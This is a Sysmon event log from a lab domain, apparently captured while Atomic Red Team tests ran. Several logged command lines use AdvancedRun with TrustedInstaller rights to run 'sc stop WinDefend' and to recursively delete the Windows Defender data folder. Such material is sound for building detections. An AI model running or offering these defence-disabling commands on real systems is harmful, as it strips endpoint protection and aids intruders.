17:59:00.584{834264DD-F464-61EA-7B04-000000002702}21802204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003982904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.591{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 /RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F464-61EA-7B04-000000002702}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003982651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.339{834264DD-F464-61EA-7B04-000000002702}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003982264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:58:48.255{834264DD-F458-61EA-7804-000000002702}4788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003982258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:58:48.129{834264DD-F457-61EA-7704-000000002702}348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:58:48.129ATTACKRANGE\Administrator 154100x80000000000000003981371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:58:46.591{834264DD-F456-61EA-7604-000000002702}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003980226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 534500x80000000000000003980225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003980224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 